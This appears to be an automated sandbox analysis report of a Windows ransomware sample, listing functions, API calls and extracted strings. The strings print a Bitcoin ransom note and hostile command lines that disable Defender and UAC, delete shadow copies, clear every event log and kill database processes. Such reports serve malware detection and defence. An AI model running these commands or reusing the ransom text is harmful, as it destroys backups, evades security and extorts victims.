5659->5661 5663 a9e43f-a9e445 5661->5663 5664 a9e449 call a75240 5663->5664 5666 a9e44e 5664->5666 5666->5463 5753 a9e429 5752->5753 5754 a9e42f call a75240 5753->5754 5754->5659
                                                                                                        APIs
                                                                                                          • Part of subcall function 00A7B040: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A7B0E7
                                                                                                          • Part of subcall function 00A7AE10: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A7AE81
                                                                                                        • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00A9D89E
                                                                                                          • Part of subcall function 00B259C6: MoveFileExW.KERNEL32(?,?,00000002), ref: 00B259D3
                                                                                                          • Part of subcall function 00B259C6: GetLastError.KERNEL32 ref: 00B259DD
                                                                                                          • Part of subcall function 00B259C6: __dosmaperr.LIBCMT ref: 00B259E4
                                                                                                        Strings
                                                                                                        • To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp, xrefs: 00A9DB1C
                                                                                                        • </span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 00A9D91F
                                                                                                        • <span class="spnn">, xrefs: 00A9D953
                                                                                                        • Dflt, xrefs: 00A9DB9D
                                                                                                        • c, xrefs: 00A9DD09
                                                                                                        • _Mail-, xrefs: 00A9DBF7
                                                                                                        • </title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou, xrefs: 00A9D8BB
                                                                                                        • u4g8, xrefs: 00A9D541
                                                                                                        • c, xrefs: 00A9DB8F
                                                                                                        • _[ID-, xrefs: 00A9DBC6
                                                                                                        • <html><head><title>, xrefs: 00A9D8A8
                                                                                                        • If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 00A9DAB2
                                                                                                        • If You Want To Restore Them Email Us : , xrefs: 00A9DA80
                                                                                                        • All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without , xrefs: 00A9DA6D
                                                                                                        • h2gq, xrefs: 00A9D57E
                                                                                                        • brok, xrefs: 00A9D609
                                                                                                        • .K0H, xrefs: 00A9D4E5, 00A9D4F2, 00A9DC42
                                                                                                        • </span></br></br>If You Want To Restore Them Email Us : <span class="spnn">, xrefs: 00A9D8ED
                                                                                                        • :\Users\, xrefs: 00A9D5ED
                                                                                                        • \AppData\N-Save.sys, xrefs: 00A9D622
                                                                                                        • 21L0I, xrefs: 00A9D8D4, 00A9DA68, 00A9DBDE
                                                                                                        • taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk, xrefs: 00A9DA49
                                                                                                        • for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1", xrefs: 00A9E4A4
                                                                                                        • file, xrefs: 00A9DB98
                                                                                                        • Z0, xrefs: 00A9D1D1
                                                                                                        • Second Email :, xrefs: 00A9D869
                                                                                                        • </span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The , xrefs: 00A9D985
                                                                                                        • reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic, xrefs: 00A9DA1B
                                                                                                        • U, xrefs: 00A9D6E8
                                                                                                        • p2h6, xrefs: 00A9D3B9, 00A9D481
                                                                                                        • n7t0, xrefs: 00A9D3A6, 00A9D46E
                                                                                                        • Telegram , ID :, xrefs: 00A9D893
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Ios_base_dtorstd::ios_base::_$ErrorFileLastMoveSimpleString::operator=__dosmaperr
                                                                                                        • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$.K0H$21L0I$:\Users\$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Second Email :$Telegram , ID :$U$\AppData\N-Save.sys$_Mail-$_[ID-$user$c$c$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$u4g8$Z0
                                                                                                        • API String ID: 4082941153-1221866610
                                                                                                        • Opcode ID: f2dc5eaf3a2c3565e2c214f5c136932c20d14d858e3477c257ec48f85b7b855c
                                                                                                        • Instruction ID: 5685c978047452649971ef2359b1251e0ba83d4ea295f0a9340bffba5d370ea6
                                                                                                        • Opcode Fuzzy Hash: f2dc5eaf3a2c3565e2c214f5c136932c20d14d858e3477c257ec48f85b7b855c
                                                                                                        • Instruction Fuzzy Hash: DC72BF75D141589ADB14E760DE52BEEB7B8AF25344F5480E8A00E631D2EF706F88CF62
                                                                                                        Function 00A78CB0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 391networkCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 6515 a78cb0-a78e46 call b01740 call ae89f6 call aa8f40 call aa1940 call aa9720 call aa1940 6528 a78e86-a78ebd 6515->6528 6529 a78e48-a78e57 6515->6529 6530 a78ebf-a78ece 6528->6530 6531 a78eee-a78f16 6528->6531 6532 a78e6d-a78e7e call b00c3c 6529->6532 6533 a78e59-a78e67 6529->6533 6534 a78ee4-a78eeb call b00c3c 6530->6534 6535 a78ed0-a78ede 6530->6535 6536 a78f47-a78f6f 6531->6536 6537 a78f18-a78f27 6531->6537 6532->6528 6533->6532 6538 a79291 call b25132 6533->6538 6534->6531 6535->6534 6535->6538 6545 a78f71-a78f80 6536->6545 6546 a78fa0-a78fbc 6536->6546 6542 a78f3d-a78f44 call b00c3c 6537->6542 6543 a78f29-a78f37 6537->6543 6549 a79296-a7929b call b25132 6538->6549 6542->6536 6543->6538 6543->6542 6551 a78f96-a78f9d call b00c3c 6545->6551 6552 a78f82-a78f90 6545->6552 6547 a78fc3-a78fcc 6546->6547 6547->6547 6554 a78fce-a7905c WSAStartup socket gethostbyname htons connect 6547->6554 6551->6546 6552->6538 6552->6551 6558 a79066-a7906f call aa1800 6554->6558 6559 a7905e-a79064 6554->6559 6561 a79074-a7908f 6558->6561 6559->6558 6559->6561 6563 a79095-a7909a 6561->6563 6563->6563 6564 a7909c-a790c1 send 6563->6564 6565 a790c7-a790ec call aa1800 recv 6564->6565 6566 a7916d-a7917f closesocket WSACleanup 6564->6566 6565->6566 6573 a790f2 6565->6573 6567 a79185-a7918e 6566->6567 6567->6567 6569 a79190-a79199 6567->6569 6571 a7919b-a791aa 6569->6571 6572 a791ca-a791ed 6569->6572 6577 a791c0-a791c7 call b00c3c 6571->6577 6578 a791ac-a791ba 6571->6578 6575 a79202-a79208 6572->6575 6576 a791ef-a791fa 6572->6576 6574 a790f8-a790fc 6573->6574 6579 a79106-a79112 6574->6579 6580 a790fe-a79100 6574->6580 6582 a79232-a7924a 6575->6582 6583 a7920a-a79216 6575->6583 6576->6575 6599 a791fc-a791fe 6576->6599 6577->6572 6578->6549 6578->6577 6588 a79114-a79120 6579->6588 6589 a7912f-a7914c call aaba60 6579->6589 6580->6579 6586 a79102-a79104 6580->6586 6584 a79274-a79290 call b005bb 6582->6584 6585 a7924c-a79258 6582->6585 6591 a79228-a7922f call b00c3c 6583->6591 6592 a79218-a79226 6583->6592 6593 a7926a-a79271 call b00c3c 6585->6593 6594 a7925a-a79268 6585->6594 6586->6579 6595 a7914e-a7916b recv 6586->6595 6596 a79124-a7912d 6588->6596 6597 a79122 6588->6597 6589->6574 6591->6582 6592->6549 6592->6591 6593->6584 6594->6549 6594->6593 6595->6566 6595->6573 6596->6574 6597->6596 6599->6575
                                                                                                        APIs
                                                                                                        • std::locale::_Init.LIBCPMT ref: 00A78D2C
                                                                                                          • Part of subcall function 00AE89F6: __EH_prolog3.LIBCMT ref: 00AE89FD
                                                                                                          • Part of subcall function 00AE89F6: std::_Lockit::_Lockit.LIBCPMT ref: 00AE8A08
                                                                                                          • Part of subcall function 00AE89F6: std::locale::_Setgloballocale.LIBCPMT ref: 00AE8A23
                                                                                                          • Part of subcall function 00AE89F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8A79
                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 00A78FDA
                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 00A78FFA
                                                                                                        • gethostbyname.WS2_32(?), ref: 00A79012
                                                                                                        • htons.WS2_32(00000E02), ref: 00A7901F
                                                                                                        • connect.WS2_32(?,?,00000010), ref: 00A79054
                                                                                                        • send.WS2_32(?,?,?,00000000), ref: 00A790B9
                                                                                                        • recv.WS2_32(?,?,00002710,00000000), ref: 00A790E4
                                                                                                        • recv.WS2_32(?,?,00002710,00000000), ref: 00A79163
                                                                                                        • closesocket.WS2_32(?), ref: 00A7916E
                                                                                                        • WSACleanup.WS2_32 ref: 00A79174
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Lockitrecvstd::_std::locale::_$CleanupH_prolog3InitLockit::_Lockit::~_SetgloballocaleStartupclosesocketconnectgethostbynamehtonssendsocket
                                                                                                        • String ID: Connection: close$ HTTP/1.1Host: $GET /$off
                                                                                                        • API String ID: 928259667-845956351
                                                                                                        • Opcode ID: a72da5c10655daf606c97b5202c4f4957cda926daae957d09cca4395521c5f74
                                                                                                        • Instruction ID: a60b8e73311aa95ddbd49ecb2ceb498007d0de2be1ae4a891541e06a99acb237
                                                                                                        • Opcode Fuzzy Hash: a72da5c10655daf606c97b5202c4f4957cda926daae957d09cca4395521c5f74
                                                                                                        • Instruction Fuzzy Hash: E3F18E30A052599FEB29DF24CD48B9DBBB5EB45304F00C2D9E40DAB292DB759B848F51
                                                                                                        Function 00A84670 Relevance: 20.4, APIs: 5, Strings: 6, Instructions: 1165COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetWindowTextLengthA.USER32(?), ref: 00A85327
                                                                                                        • GetWindowTextA.USER32(?,00000000,00000001), ref: 00A853F9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: TextWindow$Length
                                                                                                        • String ID: !$P$asykat$asykat$k2ba8v$r1d8la
                                                                                                        • API String ID: 1006428111-138844214
                                                                                                        • Opcode ID: 70cdfc7e7ffb2b9d78e4637b1bfabaca8c5ec5e0a740b7f62d264baba01a0c77
                                                                                                        • Instruction ID: 1e96540982a6d1e099c30f21ba6daa024fd1dabbd2220958069ba916239078f3
                                                                                                        • Opcode Fuzzy Hash: 70cdfc7e7ffb2b9d78e4637b1bfabaca8c5ec5e0a740b7f62d264baba01a0c77
                                                                                                        • Instruction Fuzzy Hash: B3A2D371E102598FEB28EF68CD84BEDBBB1FF45304F148299E409A7291DB759A84CF50
                                                                                                        Function 00AD4230 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123encryptionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,AE695AF0,00B99528,?,00000000), ref: 00AD4275
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00B4C5D8,000000FF,?,00AD4970), ref: 00AD427B
                                                                                                        • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 00AD428F
                                                                                                        • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 00AD42A0
                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00B4C5D8,000000FF), ref: 00AD42C5
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AD42F4
                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00AD4342
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AcquireContextCrypt$ErrorLast$Exception@8Throw___std_exception_copy
                                                                                                        • String ID: CryptAcquireContext$Crypto++ RNG
                                                                                                        • API String ID: 636621833-1159690233
                                                                                                        • Opcode ID: f7d38b5b989acccad9495114ca5f62387aded5b35f7c25f695da44c093022b3a
                                                                                                        • Instruction ID: c5a480956effeda64a92864b141046726d0c106175fad3d8f5488a7f4f2c0153
                                                                                                        • Opcode Fuzzy Hash: f7d38b5b989acccad9495114ca5f62387aded5b35f7c25f695da44c093022b3a
                                                                                                        • Instruction Fuzzy Hash: CE41A572A40309ABD710DF94CC41F9AB7FCEB08B10F50466AF901A7390EBB4A5048BA0
                                                                                                        Function 00A80239 Relevance: 11.0, Strings: 7, Instructions: 2204COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $1234567891234567$@$U12H6AN==$_Enc$_[ID-$nqpso5938fh71jfu
                                                                                                        • API String ID: 0-226619287
                                                                                                        • Opcode ID: e77f04989cfbb4dde95a36c9c28d8b17686b83193c518fbaf367cfa999196c5e
                                                                                                        • Instruction ID: 7a06b557ef58a430042d09509ba74929af760525f39b16af06053145c6cba73a
                                                                                                        • Opcode Fuzzy Hash: e77f04989cfbb4dde95a36c9c28d8b17686b83193c518fbaf367cfa999196c5e
                                                                                                        • Instruction Fuzzy Hash: 8513C071E102188FDF28EB24CD95BDDB7B9AF45304F1082A9E049A7291EB749EC9CF51
                                                                                                        Function 00A84500 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,AE695AF0), ref: 00A84565
                                                                                                        • NetApiBufferFree.NETAPI32(00000000), ref: 00A84606
                                                                                                        • NetApiBufferFree.NETAPI32(00000000), ref: 00A84622
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BufferFree$EnumUser
                                                                                                        • String ID: Default
                                                                                                        • API String ID: 2592758740-753088835
                                                                                                        • Opcode ID: c029beb19bb5e4dd4c25bbf15ba48d75562092adbd9d09fb270c4fbe4760a592
                                                                                                        • Instruction ID: 8e7ffd9cc3e7752f3460650e7f8bf89e5d67ec3c89c209c5ded9ba0c40b4bdf1
                                                                                                        • Opcode Fuzzy Hash: c029beb19bb5e4dd4c25bbf15ba48d75562092adbd9d09fb270c4fbe4760a592
                                                                                                        • Instruction Fuzzy Hash: 76415371D0021A9BCB14DF98D995BEEB7F8EB4D710F14426ED911B3290DB75AD04CB90
                                                                                                        Function 00AD4900 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptGenRandom.ADVAPI32(00000000,?,00000000,00000001), ref: 00AD4980
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00AD499F
                                                                                                          • Part of subcall function 00AD4390: GetLastError.KERNEL32(00000010,AE695AF0,7597FC30,?), ref: 00AD43E0
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AD4A0A
                                                                                                          • Part of subcall function 00B17E0C: RaiseException.KERNEL32(?,?,00AE538C,?,?,Dflt,?,?,?,?,?,00AE538C,?,00B89978,?), ref: 00B17E6C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$ContextErrorExceptionException@8LastRaiseRandomReleaseThrow
                                                                                                        • String ID: CryptGenRandom
                                                                                                        • API String ID: 1600773198-3616286655
                                                                                                        • Opcode ID: 48f75666915118b2b774837974fd639e30ff67fe6bf7d7317720bf13194716e8
                                                                                                        • Instruction ID: 4727d8335dd1491eccd82c2c202488340829490330a8a1d953108fed7593591f
                                                                                                        • Opcode Fuzzy Hash: 48f75666915118b2b774837974fd639e30ff67fe6bf7d7317720bf13194716e8
                                                                                                        • Instruction Fuzzy Hash: D831B575A00348AFDB14DF94D955BDEBBF8EF09714F4001AAE806AB381DF715A08CB60
                                                                                                        Function 00A85920 Relevance: 6.2, APIs: 4, Instructions: 164networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PathIsNetworkPathA.SHLWAPI(?,00B6AB14,?,?,?,AE695AF0), ref: 00A859A7
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00A859D7
                                                                                                        • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,AE695AF0), ref: 00A859F1
                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,AE695AF0), ref: 00A85A0C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Path$ByteCharDiskFreeMultiNetworkSpaceWide__alloca_probe_16
                                                                                                        • String ID:
                                                                                                        • API String ID: 592574438-0
                                                                                                        • Opcode ID: 2ead21b83b2dd93842f523fe07bb9f9b7446c28dd19d0a9fd27a6c07429249dc
                                                                                                        • Instruction ID: 7b65a19abca6300312a66dae2ff19c32d30e0610fbbb98120de232b2bc4bd0bc
                                                                                                        • Opcode Fuzzy Hash: 2ead21b83b2dd93842f523fe07bb9f9b7446c28dd19d0a9fd27a6c07429249dc
                                                                                                        • Instruction Fuzzy Hash: EF51E071E00609DFDB18EFA8C8C5AADF7B5FF45750F1442A9E801A7291EB31AD05CB50
                                                                                                        Function 00A836F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00A83733
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: NameUser
                                                                                                        • String ID: user$user
                                                                                                        • API String ID: 2645101109-2939825470
                                                                                                        • Opcode ID: 472aaa8096f1e4d246876bbe946d5fccea58aba579f95837b051d4db67a1a0bb
                                                                                                        • Instruction ID: 3ae8b8697f0d69c42d0ee0464d705244e61abb08d6108d6afbf25122d5e0be0d
                                                                                                        • Opcode Fuzzy Hash: 472aaa8096f1e4d246876bbe946d5fccea58aba579f95837b051d4db67a1a0bb
                                                                                                        • Instruction Fuzzy Hash: 23417B71A1112DABDF24EF64CD98BDDB7B5EB58300F2046D9E409A7290DB38AB84CF50
                                                                                                        Function 00AD47F0 Relevance: 1.6, APIs: 1, Instructions: 81encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00AD487A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
